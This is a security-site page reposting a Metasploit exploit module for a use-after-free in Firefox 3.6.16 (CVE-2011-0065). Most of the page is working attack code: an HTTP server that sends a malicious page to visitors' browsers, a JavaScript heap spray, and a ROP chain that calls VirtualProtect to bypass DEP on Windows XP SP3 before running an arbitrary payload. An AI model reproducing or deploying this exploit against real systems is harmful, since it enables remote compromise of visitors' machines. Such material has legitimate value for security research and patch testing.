首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mozilla Firefox 3.6.16 mChannel use after free Exploit
来源:http://www.metasploit.com 作者:regenrecht 发布时间:2011-08-11  
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    #
    # This module acts as an HTTP server
    #
    include Msf::Exploit::Remote::HttpServer::HTML

    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({
        :ua_name => HttpClients::FF,
        :ua_minver => "3.6.16",
        :ua_maxver => "3.6.16",
        :os_name => OperatingSystems::WINDOWS,
        :javascript => true,
        :rank => NormalRanking,
    })

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Mozilla Firefox 3.6.16 mChannel use after free Exploit',
            'Description'    => %q{
                    This module exploits an use after free vulnerability in Mozilla
                Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
                OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
                becomes a dangling pointer and can be reused when setting the OBJECTs
                data attribute. (Discovered by regenrecht). This module uses heapspray
                with a minimal ROP chain to bypass DEP on Windows XP SP3
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'regenrecht',   #  discovery
                    'Rh0'    # wrote metasploit module
                ],
            'Version'        => '0.0',
            'References'     =>
                [
                    ['CVE',    '2011-0065'],
                    ['OSVDB',  '72085'],
                    ['URL',    'https://bugzilla.mozilla.org/show_bug.cgi?id=634986'],
                    ['URL',    'http://www.mozilla.org/security/announce/2011/mfsa2011-13.html']
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Payload'        =>
                {
                    'Space'    => 1024,
                    'BadChars' => "",
                },
            'Targets'        =>
                [   # worked with 100% reliability
                    [ 'Firefox 3.6.16, Windows XP SP3 (VirtualBox 4)',
                        {
                            'Platform' => 'win',
                            'Arch' => ARCH_X86,
                        }
                    ],
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'May 10 2011'
            ))
    end

    def on_request_uri(cli, request)

        # Re-generate the payload
        return if ((p = regenerate_payload(cli).encoded) == nil)

        print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
        send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

        # Handle the payload
        handler(cli)
    end

    def generate_html(payload)
        
        # DEP bypass
        custom_stack = [
            0x1052c871, # mov esp,[ecx] / mov edx,5c86c6ff add [eax],eax / xor eax,eax / pop esi / retN 0x8
            0x7c801ad4,     # VirtualProtect
            0xbeeff00d,
            0xbeeff00d,
            0x7c874413, # jmp esp
            0x0c0c0048, # start address
            0x00000400, # size 1024
            0x00000040, # Page EXECUTE_READ_WRITE
            0x0c0c0c00  # old protection
            ].pack("V*")
            
        payload_buf = ''
        payload_buf << custom_stack
        payload_buf << payload
        escaped_payload = Rex::Text.to_unescape(payload_buf)
        
        custom_js = %Q|
        
e = document.getElementById("d");
e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)
fake_obj_addr = unescape("\\x0c%u0c0c")

// taken and modified from adobe_flashplayer_newfunction.rb
var sc = unescape("#{escaped_payload}")
var ret_addr = unescape("%u0024%u0c0c")
while(ret_addr.length+20+8 < 0x100000) {ret_addr += ret_addr}
var b = ret_addr.substring(0,(0x48-0x24)/2)
b += sc
b += ret_addr
var next = b.substring(0,0x10000/2)
while(next.length<0x800000) {next += next}
var again = next.substring(0,0x80000 - (0x1020-0x08)/2)
array = new Array()
for (n=0;n<0x1f0;n++){
    array[n] = again + sc
}

e.data = ""
        |
        
        return %Q|
<html>
<body>
<object id="d"><object>
<script type="text/javascript">
#{custom_js}
</script></body></html>
        |
    end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PXE exploit server
·Free CD to MP3 Converter 3.1 U
·Net112企业建站系统遍历目录和后
·HP JetDirect PJL Interface Uni
·Sun/Oracle GlassFish Server Au
·HP JetDirect PJL Query Executi
·FreeAmp 2.0.7 .fat Buffer Over
·LiteServe 2.81 PASV Command De
·ABBS Electronic Flashcards v2.
·Acoustica Mixcraft v1.00 Local
·ABBS Audio Media Player v3.0 B
·Excel SLYK Format Parsing Buff
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved